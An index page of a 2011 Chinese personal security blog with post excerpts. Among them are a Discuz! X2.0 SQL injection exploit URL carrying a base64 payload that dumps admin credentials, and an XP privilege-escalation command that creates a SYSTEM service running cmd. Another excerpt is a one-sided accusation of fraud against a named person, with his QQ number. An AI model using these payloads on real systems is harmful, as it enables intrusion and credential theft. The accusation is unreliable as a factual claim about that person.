Discuz! X2.0 SQL注入漏洞 EXP

2011-6-30 王健宇 转载

DZ2.0直接暴管理账号密码(默认前缀的情况下)


http://xxx/forum.php?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2VsZWN0IDEsZ3JvdXBfY29uY2F0KHVzZXJuYW1lLDB4N0MzMjc0NzQ3QyxwYXNzd29yZCkgZnJvbSBwcmVfY29t...

阅读全文>>

标签: Discuz! X2.0 0day DZ2.0 0day Discuz! X2.0 exp DZ2.0 exp

评论(2) 浏览(8071)

关于最近出的xp本地system提权脚本研究

2011-6-22 王健宇

在看到这个脚本以后便明白了,其实这也算不上什么0day,只是利用任务计划而已。

同样我们还可以利用其他方式来提升到system权限,如:系统启动服务项也是system权限,按某些快捷键启动的也是system权限。

如代码:

sc Create xiaoyu binPath= "cmd /c start cmd" type= own type= interact start= auto

net...

阅读全文>>

标签: xp本地system提权脚本 系统服务提权

评论(7) 浏览(4313)

在Windows上安装Metasploit Framework 3.7.1出现问题及解决方法

2011-6-17 王健宇 转载

今天尝试安装了一下Metasploit Framework 3.7.1,在装有Windows系统上尝试安装,总是会报错:

There has been an error. …… ALTER USER postgres PASSWORD ‘XXXXXXX’

经搜索后得知解决方法,这里转载并总结一下:

MSF安装...

阅读全文>>

标签: postgresql安装出错 Metasploit3.7安装出错

评论(2) 浏览(3511)

高考完了,不容易的过了几天

2011-6-13 王健宇 日志

6月7日-6月8日好不容易熬完了这个学期,艰难的2天考完了。

当天同学们和老师一起在学校办了毕业晚会,不容易啊,晚上九点才开始,隔壁班还有卡啦OK。

学校对我们班看的没那么重唉,卡啦OK也没,就拿个杯子当麦克风清唱,杯具的喉咙都嘶了。

6月9日下午就去了娄底,想租个房子找份工作。艰难啊!

卡上钱也不多了,这几天上网时间少,几乎都浪费在了没意义的事情上,很多事情影响了自己的情绪。

最近的事情舆论也大,我也不想...

阅读全文>>

标签: 高考完的生活

评论(2) 浏览(2821)

揭露做网络安全的骗子庞伟

2011-6-10 王健宇 日志

骗我的人名叫庞伟,网名:PW,QQ:200844019

事情是2011年5月1日开始的,当时我的腾讯微博想认证,看这个安全运维网的成员都认证通过了,觉得他们应该有办法,就找到了这个庞伟。谁知道他说2-3天就能认证通过的,现在1个月过去了,不但没有认证而且一直没有给我退款。本文里面有聊天记录。

朋友们可以看看,以后远离这个SB,这种人没有一点信誉。

阅读全文>>

标签: 200844019 QQ200844019 QQ:200844019 安全运维网庞伟 庞伟是骗子 PW庞伟

评论(16) 浏览(4268)

Powered by emlog sitemap